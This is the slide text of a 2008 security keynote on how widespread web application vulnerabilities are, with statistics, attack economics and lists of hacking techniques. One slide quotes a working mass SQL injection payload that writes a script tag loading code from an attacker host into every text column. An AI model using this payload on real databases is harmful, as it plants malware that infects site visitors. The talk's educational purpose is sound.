hacks happen - (keynote) stanford emerging threats and defenses symposium (07232008)

© 2008 WhiteHat Security, Inc.

Hacks Happen

Jeremiah GrossmanWhiteHat Security founder & CTO blog: http://jeremiahgrossman.blogspot.com/email: jeremiah@whitehatsec.com

1

0wN3d!!12

2

Don’t write your own crypto algorithmsDon’t run web servers as rootUse Secure Sockets Layer (SSL)Have proper file system permissions

Wait, how does this make a website secure?

1998’ best practices

3

3

What’s input validation?

4

4

http://www.w3.org/Security/Faq/5

5

Probably Cross-Site Scripting

6

6

Will hack for T-Shirt :)

7

7

I made $14 an hour

8

8

Job Description: Hack Everything!

Official Title“the hacker yahoo”

9

9

...and play foosball

10

10

11

11

...No articles...

...No white papers...

...No methodologies...

NOTHING!12

12

...except for a hacker named rain.forest.puppy writing about an obscure attack called SQL Injection.

13How I hacked PacketStormhttp://packetstormsecurity.nl/0002-exploits/rfp2k01.txt

13

Protect this website and the ~599 others

Find the vulnerabilities before the bad guys

14

14

Job security

15

15

16

16

17

Web Application Security Consortiumhttp://www.webappsec.org

Open Web Application Security Projecthttp://www.owasp.org//

17

“ There is no "secure development lifecycle" in the vast majority of universities' degree programs - that is, security is not "baked into" graduates of relevant programs (e.g., computer science) throughout their degree programs. And that is a problem, perhaps the problem plaguing the software industry.”

Mary Ann DavidsonChief Security Officer at Oracle

18The Supply Chain Problemhttp://blogs.oracle.com/maryanndavidson/2008/04/08#a286

18

17 million programmers

worldwideWriting 6,000 lines of code per year (each)

19

17 million programmers worldwidehttp://www.itjungle.com/tlb/tlb011607-story06.htmlhttp://deepfreeze9.blogspot.com/2007/08/factoid-19-million-programmers-by-2010.htmlhttp://blogs.zdnet.com/ITFacts/?p=12808

U.S. Department of Labor Bureau of Labor Statistics - Computer Programmershttp://www.bls.gov/oco/ocos110.htm

~6 KLOC per year per developerhttp://blogs.msdn.com/philipsu/archive/2006/06/14/631438.aspxhttp://fixunix.com/linux/370267-attackers-hose-down-microsoft-s-jet-db-engine-5.htmlhttp://blogs.msdn.com/eldar/archive/2006/07/07/647858.aspx

19

Windows 2000 29 MillionRed Hat Linux 7.1 30 Million

Windows XP 40 MillionWindows Vista 50 MillionMac OS X 10.4 86 Million

= 102 BillionNew lines of code pushed per year

20Source lines of codehttp://en.wikipedia.org/wiki/Source_lines_of_code

20

Conservative research says: 1 security defect for every 10,000 lines of code

211 vulnerability per 10 KLOChttp://www.informationweek.com/story/showArticle.jhtml?articleID=205600229&cid=RSSfeed_IWK_Allhttp://www.pcworld.com/businesscenter/article/141226/open_source_security_bugs_uncovered.html

21

(potentially) newundiscoveredvulnerabilities

850,000 per month 28,000 per day

10,200,000per year

22

22

In 2007 IBM X-force reported vulnerabilities 6,437

Total vulnerabilities EVER reported in National Vulnerability Database CVE Publication rate: 16 vulnerabilities / day

32,000

IBM Internet Security Systems X-Force 2007 Trend Statisticshttp://www-935.ibm.com/services/us/iss/pdf/etr_xforce-2007-annual-report.pdf

National Vulnerability Databasehttp://nvd.nist.gov/

23

If only 1% of new undiscovered vulnerabilities are exploitable:

102,000zero-days per year

24

24

Location of the other ~95,000 zero-days:

unknown25

25

172,000,000 websites

millions more added per month

26June 2008 Web Server Surveyhttp://news.netcraft.com/archives/2008/06/22/june_2008_web_server_survey.html

26

809,000 websites use SSL

protecting password, credit card numbers, social security numbers, and

our email (if we’re lucky).

27Extended Validation SSL Certificates now 1 Year Oldhttp://news.netcraft.com/archives/2008/02/17/extended_validation_ssl_certificates_now_1_year_old.html

27

9 out of 10 websites have vulnerabilities

allowing hackers unauthorized access

28

WhiteHat Security Website Security Statistics Report (March)https://whitehatsec.market2lead.com/go/whitehatsec/stats0308

“A 2007 report from NTA Monitor found that 90 percent of UK-based company websites harboured at least one weakness that could allow hackers to gain unauthorised access.”http://www.continuitycentral.com/feature0555.htm

70% of websites at immediate risk of being hacked!http://www.acunetix.com/news/security-audit-results.htm

http://www.heise-online.co.uk/news/Every-second-web-application-contains-between-one-and-ten-holes--/110515http://www.symantec.com/business/theme.jsp?themeid=threatreport

28

hacked

29

29

If there’s just 1 vulnerability on 90% of the SSL websites...Other reports say an average of 7

728,100 total vulnerabilities

30WhiteHat Security Website Security Statistics Report (March)https://whitehatsec.market2lead.com/go/whitehatsec/stats0308

30

XSSed.com has reported:

20,843 total vulnerabilities

1,072 fixed (5%)

31http://www.xssed.com/

31

“SSL is like using an armored truck to transport rolls of pennies between someone on a park bench and someone doing business from a cardboard box.”Eugene H. Spafford, Professor Purdue University - 2002

“[Application security] is one of the most serious and oftenoverlooked risks facing government and commercial organizations. The root cause of these risks is not flawed software, but software development processes that pay little or no attention to security."Jeff Williams, OWASP Chair - 2003

“The reason is that bad software lies at the heart of all computer security problems, and more and more bad software is being produced. Traditional solutions simply treat the symptoms, not the problem, and usually do so in a reactive way.”Gary McGraw, CTO of Cigital - 2001

3232

A new infected Web page is discovered every:5 seconds 24 hours a day365 days a year

Over 79% of websites hosting malicious code are legitimate(compromised by attackers)

33Sophos: One Web page infected every five secondshttp://news.zdnet.com/2424-1009_22-198647.html

33

2006, 0.3% of all Internet queries return at least one URL containing malicious content.

2007 - 1.3%

2008 - ?

34How Unsecure Is The Web?http://blogs.forrester.com/srm/2008/03/how-unsecure-is.html

34

35

35

Kraken400,000 infected computers

Srizbi315,000 infected computers

Storm200,000 infected computers

2nd generation malware

36Vint Cerf: one quarter of all computers part of a botnethttp://arstechnica.com/news.ars/post/20070125-8707.html

36

37http://www.fbi.gov/cyberinvest/protect_online.htm

37

38

38

1. Google recon for weak websites (*.asp, *.php)2. Generic SQL Injection populates databases with malicious JavaScript IFRAMEs.3. Visitors arrive (U.N., DHS, etc.) and their browser auto-connects to a malware server infecting their machine with trojans.4. Botnets form with then continue SQL injecting websites

Mass SQL Injection

39http://blogs.zdnet.com/security/?p=1150http://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines.htmlhttp://blogs.zdnet.com/security/?p=1122http://ddanchev.blogspot.com/2008/04/united-nations-serving-malware.html

39

DECLARE @T varchar(255), @C varchar(255);DECLARE Table_Cursor CURSOR FORSELECT a.name, b.nameFROM sysobjects a, syscolumns bWHERE a.id = b.id AND a.xtype = 'u' AND(b.xtype = 99 ORb.xtype = 35 ORb.xtype = 231 ORb.xtype = 167);OPEN Table_Cursor;FETCH NEXT FROM Table_Cursor INTO @T, @C;WHILE (@@FETCH_STATUS = 0) BEGINEXEC('update [' + @T + '] set [' + @C + '] =rtrim(convert(varchar,[' + @C + ']))+''<script src=http://evilsite.com/1.js></script>''');FETCH NEXT FROM Table_Cursor INTO @T, @C;END;CLOSE Table_Cursor;DEALLOCATE Table_Cursor;

40Skeleton key unlocks Microsoft SQL servers in latest Web attackhttp://www.news.com/8301-10789_3-9938224-57.html

40

China-based online “Password Recovery” services:You pay them to hack into “your” account.

1. 300 Yuan ($43) to break an overseas mailbox password, with 85% probability of success.

2. 200 Yuan ($29) to break a domestic mailbox password, with 90% probability of success. 3. 1000 Yuan ($143) to break a company’s mailbox password (no success rate given).

Also on the menu:passwords for 163, 126, QQ, Yahoo, Sohu, Sina, TOM, Hotmail, MSN…etc.

41http://www.thedarkvisitor.com/2008/04/mailbox-passwords-for-sale-chinese-hacker-business-or-scam/http://news.cnnb.com.cn/system/2008/04/14/005548493.shtml

41

42

Hire to Hack http://www.hire2hack.net/

Variable project-based pricing $150 (USD) minimum. They accept Western Union.

42

Insider: someone with a fiduciary role with a company. A corporate executive, investment banker or attorney.

Not a hacker

43Hacker holds onto ill-gotten gains thanks to US courtshttp://www.theregister.co.uk/2008/02/19/insider_trading_catch22

43

44

44

PayPal or eBay Acct $8Credit cards w/ CCV & exp $25

WMF Exploit $4,000RealPlayer 11 $10,000OS X $10,000 +

15-inch MacBook Pro

0-Days

Windows Vista $50,000

What Microsoft pays for 0-days... $0

$1,000Bank Acct

World-of-Warcraft l-70 Acct $4

Internet Explorer $100,000

http://www.bestsecuritytips.com/news+article.storyid+116.htmhttp://securitywatch.eweek.com/browsers/russian_firm_demos_realplayer_zeroday_exploit.htmlhttp://blogs.technet.com/security/archive/2008/04/10/rsa-2008-keynote-john-thompson.aspxhttp://www.theregister.co.uk/2007/04/20/pwn-2-own_winner/http://www.arnnet.com.au/index.php/id;741896054;pp;2;fp;4194304;fpid;1http://www.letemps.ch/template/economie.asp?page=9&article=228747

45

average window of exposure (before patching) for well-known vulnerabilities

vendors:

55 days

80% of exploits are available within

19 daysof disclosure.

46IBM Internet Security Systems X-Force 2007 Trend Statisticshttp://www-935.ibm.com/services/us/iss/pdf/etr_xforce-2007-annual-report.pdf

46

Percentage likelihood that a website has a particular vulnerability by class

WhiteHat Security Website Security Statistics Report (March)https://whitehatsec.market2lead.com/go/whitehatsec/stats0308

47

Source: Software Security, by Gary McGraw

Security in the SDLC

48

48

Studies indicate that 75% of security breaches are due to flaws in software.

90% of IT security spending is on perimeter security such as firewalls

49

Insanity - Doing the Same Thing Over and Over Again Expecting a Different Resulthttp://blogs.csoonline.com/insanity_doing_the_same_thing_over_and_over_again_expecting_a_different_result

Application security trend report for q4 2007http://www.cenzic.com/pdfs/Cenzic_AppSecTrends_Q4-07.pdf

Facing up to the threat of cyber-crimehttp://www.continuitycentral.com/feature0555.htm

49

50

VA + WAF

50

493,000 in 2005

752,000 in 2006

480,000 in 2007

Website Defacements

~1 defacement every second

51http://www.zone-h.org/content/view/14928/30/

51

52http://www.infoworld.com/article/07/11/26/Another-inconvenient-truth-Al-Gores-Web-site-hacked_1.htmlhttp://news.netcraft.com/archives/2008/04/21/hacker_redirects_barack_obamas_site_to_hillaryclintoncom.htmlhttp://www.scmagazineus.com/XSS-flaw-on-Obama-page-sends-visitors-to-Clinton-site/article/109309/

52

Average Time to Fix in Days

180 270 365

53WhiteHat Security Website Security Statistics Report (March)https://whitehatsec.market2lead.com/go/whitehatsec/stats0308

53

1. Take the website down

2. Revert to an older version of the website/code (if secure)

3. Stay up while exposed

Options after a vulnerability is found, but before we’re able to fix it.

54

54

55Too much code, too few application security specialistshttp://www.regdeveloper.co.uk/2008/05/28/agile_security/

55

Lack of control

Responsible for the security of the Website(s)Justifies resource allocation to the business ownersPromotes security inside the SDLC via policy and education

Network security solutions don’t work for Web applicationsCan’t fix the vulnerabilities without developer involvementDevelopers don’t work for them

IT Security

56

56

Ajax

Silverlight

Flash/Flex

Ruby on Rails

DojoC#

JavaScript

JSON

OpenID

Widgets

SaaS

HTML5Python

J2EE

MooTools

RSS

Social Networks

OpenSocial OpenSocial

Welcome to

Web 2.057

57

Bill rate for a source code reviewer $150 (US)per hour

$25,000 (US)Source code review for the average small to mid-sized website

To cover 10% of the SSL Websites (~80,000) ...

Total man hours 13,360,000

Source code reviewers 6,680

Annual economic burden $2,000,000,000 (US)

58

58

if every 10 seconds...

It would take about 3 years to find all the new vulnerabilities

for just this year.

If all new code is inspectedto find 1 undiscovered

vulnerability every 60 seconds...

We’d never find them all.

59

59

And then we still have to fix the vulnerabilities

Hackers just need to exploit one to get in.

60

60

starting in 2006The DHS spent $300,000 (US) on a project to

find and fix security defects in 180 Open Source projects.

Found 1 security defect per 1,000 lines (not 10,000)

7,826 defects fixed

$38 per vulnerability

By 2012 over 90% of enterprises will use open source

61

Open Source Code Contains Security Holeshttp://www.informationweek.com/news/security/showArticle.jhtml?articleID=205600229&_requestid=87046http://www.pcworld.com/businesscenter/article/141226/open_source_security_bugs_uncovered.html

Gartner: Open source will quietly take overhttp://news.zdnet.co.uk/software/0,1000000121,39379900,00.htm

61

Conservative estimates put the total annual IT security spend in the US at $50 billion and e-crime losses at $100 billion.

We’re losing two dollars for every dollar spent.

62

Facing up to the threat of cyber-crimehttp://www.continuitycentral.com/feature0555.htm

Calculating the Costs of Cyber Crimehttp://blog.washingtonpost.com/securityfix/2007/09/counting_the_cost_of_cyber_cri.html

62

Change does not happen overnight

From: Bill GatesSent: Tuesday, January 15, 2002 5:22 PMTo: Microsoft and Subsidiaries: All FTE

Subject: Trustworthy computing

Secure Code ROIReduce CostsIncreased RevenueLoss AvoidancePolicy Compliance

63

63

The Attack of the TINY URLsBackdooring MP3 FilesBackdooring QuickTime MoviesCSS history hacking with evil marketingI know where you've beenStealing Search Engine Queries with JavaScriptHacking RSS FeedsMX Injection : Capturing and Exploiting Hidden Mail ServersBlind web server fingerprintingJavaScript Port ScanningCSRF with MS WordBackdooring PDF FilesExponential XSS AttacksMalformed URL in Image Tag Fingerprints Internet ExplorerJavaScript Portscanning and bypassing HTTP AuthBruteforcing HTTP Auth in Firefox with JavaScriptBypassing Mozilla Port BlockingHow to defeat digg.comA story that diggs itselfExpect Header Injection Via FlashForging HTTP request headers with FlashCross Domain Leakage With Image SizeEnumerating Through User AccountsWidespread XSS for Google Search ApplianceDetecting States of Authentication With Protected ImagesXSS Fragmentation AttacksPoking new holes with Flash Crossdomain Policy FilesDetecting Privoxy Users and Circumventing ItUsing CSS to De-AnonymizeResponse Splitting Filter EvasionAdultspace XSS Worm

(2006 and 2007) New Web Hacking TechniquesCSS History Stealing Acts As CookieDetecting FireFox ExtensionsStealing User Information Via Automatic Form FillingCircumventing DNS Pinning for XSSNetflix.com XSRF vulnBrowser Port Scanning without JavaScriptWidespread XSS for Google Search ApplianceBypassing Filters With EncodingVariable Width EncodingNetwork Scanning with HTTP without JavaScriptAT&T Hack Highlights Web Site VulnerabilitiesHow to get linked from SlashdotF5 and Acunetix XSS disclosureAnti-DNS Pinning and Circumventing Anti-Anti DNS pinningGoogle plugs phishing holeNikon magazine hit with security breachGovernator HackMetaverse breached: Second Life customer database hackedHostGator: cPanel Security Hole Exploited in Mass HackI know what you've got (Firefox Extensions)ABC News (AU) XSS linking the reporter to Al QaedaAccount Hijackings Force LiveJournal ChangesXanga Hit By Script WormAdvanced Web Attack Techniques using GMailPayPal Security Flaw allows Identity TheftInternet Explorer 7 "mhtml:" Redirection Information DisclosureBypassing of web filters by using ASCIIGoogle Indexes XSSXML Intranet Port ScanningIMAP Vulnerable to XSSSelecting Encoding Methods For XSS Filter Evasion64

64

Anonymizing RFI Attacks Through GoogleGoogle Hacks On Your BehalfGoogle Dorks Strike AgainCross-Site Printing (Printer Spamming)Stealing Pictures with PicasaHScan ReduxISO-8895-1 Vulnerable in Firefox to Null InjectionMITM attack to overwrite addons in FirefoxMicrosoft ASP.NET Request Validation Bypass Vulnerability (POC)Non-Alpha-Non-Digit 3Steal History without JavaScriptPure Java™, Pure Evil™ PopupsGoogle Adsense CSRF holeThere’s an OAK TREE in my blog!?!?!BK for Mayor of Oak Tree ViewGoogle Docs puts Google Users at RiskAll Your Google Docs are Belong To US…Java Applets and DNS RebindingScanning internal Lan with PHP remote file opening.Firefox File Handling WoesFirefoxurl URI Handler FlawBugs in the Browser: Firefox’s DATA URL Scheme VulnerabilityMultiviews Apache, Accept Requests and free listingOptimizing the number of requests in blind SQL injectionBursting Performances in Blind SQL Injection - Take 2 (Bandwidth)Port Scan without JavaScriptFavorites Gone WildLogin Detection without JavaScriptAnti-DNS Pinning ( DNS Rebinding ) : Online DemonstrationUsername Enumeration Timing Attacks (Sensepost)Google GMail E-mail Hijack TechniqueRecursive Request DoSExaggerating Timing Attack Results Via GET FloodingInitiating Probes Against Servers Via Other Servers

Effects of DNS Rebinding On IE’s Trust ZonesPaper on Hacking Intranets Using Websites (Not Web Browsers)More Port Scanning - This Time in FlashHTTP Response Splitting and Data: URI scheme in FirefoxRes:// Protocol Local File EnumerationRes Timing AttackIE6.0 Protocol GuessingIE 7 and Firefox Browsers Digest Authentication Request SplittingHacking Intranets Via Brute ForceHiding JS in Valid ImagesInternet Archiver Port ScannerNoisy Decloaking MethodsCode Execution Through Filenames in UploadsCross Domain Basic Auth Phishing TacticsAdditional Image Bypass on WindowsDetecting users via Authenticated RedirectsPassing Malicious PHP Through getimagesize()Turn Any Page Into a Greasemonkey PopupEnumerate Windows Users In JSAnti-DNS Pinning ( DNS Rebinding ) + Socket in FLASHIframe HTTP PingRead Firefox Settings (PoC)Stealing Mouse Clicks for Banner Fraud(Non-Persistent) Untraceable XSS AttacksInter Protocol ExploitationDetecting Default Browser in IEBypass port blocking in Firefox, Opera and Konqueror.LocalRodeo DetectionImage Names Gone BadIE Sends Local Addresses in Referer HeaderPDF XSS Can Compromise Your MachineUniversal XSS in Adobe’s Acrobat Reader PluginFirefox Popup Blocker Allows Reading Arbitrary Local FilesIE7.0 Detector65

65

overwriting cookies on other people’s domains in Firefox.Embeding SVG That Contains XSS Using Base64 Encoding in FirefoxFirefox Header Redirection JavaScript ExecutionMore URI Stuff… (IE’s Resouce URI)Hacking without 0days: Drive-by JavaGoogle Urchin password theft madnessUsername Enumeration VulnerabilitiesClient-side SQL Injection AttacksContent-Disposition HackingFlash Cookie Object TrackingJava JAR Attacks and FeaturesSevere XSS in Google and Others due to the JAR protocol issuesWeb Mayhem: Firefox’s JAR: Protocol issues (bugzilla)0DAY: QuickTime pwns FirefoxExploiting Second LifeInjecting the script tag into XMLCross-Browser Proxy UnmaskingSpoofing Firefox protected objects

66

Top Ten Web Hacks of 2007 (Official)http://jeremiahgrossman.blogspot.com/2008/01/top-ten-web-hacks-of-2007-official.html

Top 10 Web Hacks of 2006http://jeremiahgrossman.blogspot.com/2006/12/top-10-web-hacks-of-2006.html

66

Website Founded

Amazon 1994

Yahoo 1995

eBay 1995

Bank of America

1997

Google 1998

MySpace 2003

YouTube 2005

Vulnerability Attack

Buffer Overflow 1996

Command Injection

1996

SQL Injection 2004

XSS 2005

Predictable Resource Location

?

HTTP Response Splitting

2005 / ?

CSRF ?

More major websites were launched before significant classes of attack were “well-known”

67

67

68http://xkcd.com/327/

68

The bad guys do

69

69

"Personally, I'd love to see everyone go through an OWASP-based source-code review, but certainly, that's not going to happen."

Bob RussoPCI Standards Council General Manager

Next version of PCI DSS due in Septemberhttp://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1309120,00.html?track=sy160&asrc=RSS_RSS-10_160

70

70

Get Rich or Die Trying"Making Money on The Web, The Black Hat Way"

by Jeremiah Grossman, Arian Evans

71https://www.blackhat.com/html/bh-usa-08/bh-usa-08-schedule.html

71

don’t let them scare you

72

72

73

74

The Good News

74

75

http://www.webappsec.org/

Web Security Mailing List (2,600+ subscribers)Threat Classification (v2 in progress)Statistics (additional vendors coming on board)Web Application Firewall Evaluation Criteria (v2 in progress)Web Hacking Incident DatabaseDistributed Open Proxy Honeypot

75

76

http://www.owasp.org/

76

PCI-DSS 6.6

77

77

78

AppSec ConferencesOWASP ChaptersSANSWASC Meet-Ups

Google Calendar: InfoSec Events in North Americahttps://www.google.com/calendar/embed?src=s7j59ntjl7lbae0517luaa6fk0%40group.calendar.google.com&ctz=America/Los_Angeles

78

79http://metasploit.com/users/hdm/tools/debian-openssl/http://www.theregister.co.uk/2008/05/21/massive_debian_openssl_hangover/http://blogs.zdnet.com/security/?p=1102

79

80

80

For more information visit: www.whitehatsec.com/

Jeremiah Grossman, founder and CTOblog: http://jeremiahgrossman.blogspot.com/email: jeremiah@whitehatsec.com

Thank You

81